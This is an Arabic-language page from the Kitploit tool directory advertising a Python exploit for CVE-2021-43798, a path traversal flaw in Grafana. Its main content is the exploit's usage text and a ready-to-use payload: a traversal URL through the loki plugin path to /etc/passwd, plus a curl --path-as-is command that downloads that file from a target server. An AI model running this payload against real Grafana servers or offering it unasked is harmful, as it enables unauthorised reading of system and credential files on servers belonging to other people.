Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798 — استغلال بلغة Python لـ CVE-2021-43798، ثغرة اجتياز المسار في Grafana تتيح قراءة ملفات عشوائية عبر اجتياز الدليل في عناوين URL الخاصة بالإضافات. | Kitploit
أدوات/GitHubGitHub/g01d3nw01f/cve-2021-43798
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubg01d3nw01f/cve-2021-43798

CVE-2021-43798

استغلال بلغة Python لـ CVE-2021-43798، ثغرة اجتياز المسار في Grafana تتيح قراءة ملفات عشوائية عبر اجتياز الدليل في عناوين URL الخاصة بالإضافات.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

usage: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: error: the following arguments are required: -H/--host

example: python3 grafana-exploit.py --host <target_host>

إذا تمت قراءة الملف التعسفي بنجاح اعرض عنوان URL الخاص بالطلب وأمر curl

root@kitploit:~
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"

لذا إذا أردت تنزيل الملف، نفّذ الأمر كما هو موضح بالأعلى

root@kitploit:~
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
تنزيل الأداة